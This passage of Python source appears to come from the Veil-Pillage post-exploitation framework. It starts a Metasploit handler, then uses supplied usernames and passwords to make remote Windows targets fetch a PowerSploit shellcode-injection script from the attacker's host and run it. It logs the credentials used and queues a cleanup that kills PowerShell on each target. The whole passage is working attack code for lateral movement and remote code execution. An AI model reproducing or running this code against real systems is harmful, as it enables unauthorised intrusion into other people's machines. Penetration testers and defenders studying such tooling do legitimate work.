        sys.stdout.write(" [*] Executing module: " + helpers.color(self.name) + "...")

        # if we're using Veil-Evasion's generated handler script, try to spawn it
        if spawnHandler.lower() == "true":
            # turn our shellcode object into a handler script
            handlerPath = helpers.shellcodeToHandler(sc)
            # make sure a handler was returned
            if handlerPath != "":
                # command to spawn a new tab
                cmd = (
                    "gnome-terminal --tab -t \"Veil-Pillage Handler\" -x bash -c \"echo ' [*] Spawning Metasploit handler...' && msfconsole -r '"
                    + handlerPath
                    + "'\""
                )
                # invoke msfconsole with the handler script in a new tab
                os.system(cmd)
                raw_input("\n\n [>] Press enter when handler is ready: ")

        # path to the PowerSploit Invoke-ShellcodeMSIL.ps1 powershell script
        secondStagePath = settings.VEIL_PILLAGE_PATH + "/data/PowerSploit/Invoke-ShellcodeMSIL.ps1"

        # command to invoke the appropriate shellcode in the script
        scriptArguments = "Invoke-ShellcodeMSIL -Shellcode @(%s)" % (sc_transformed)

        # trigger the powershell download on all targets
        delivery_methods.powershellHostTrigger(
            self.targets, username, password, secondStagePath, lhost, scriptArguments, triggerMethod, ssl=use_ssl
        )

        for target in self.targets:
            self.output += (
                "[*] Powersploit:Invoke-ShellcodeMSIL triggered using creds '"
                + username
                + ":"
                + password
                + "' on "
                + target
                + " using "
                + triggerMethod
                + "\n"
            )

            # build our cleanup file -> kill all powershell processes
            killCMD = "taskkill /f /im powershell.exe"
            self.cleanup += (
                "executeCommand|"
                + target
                + "|"
                + username
                + "|"
                + password
                + "|"
                + killCMD
                + "|"
                + triggerMethod
                + "\n"
            )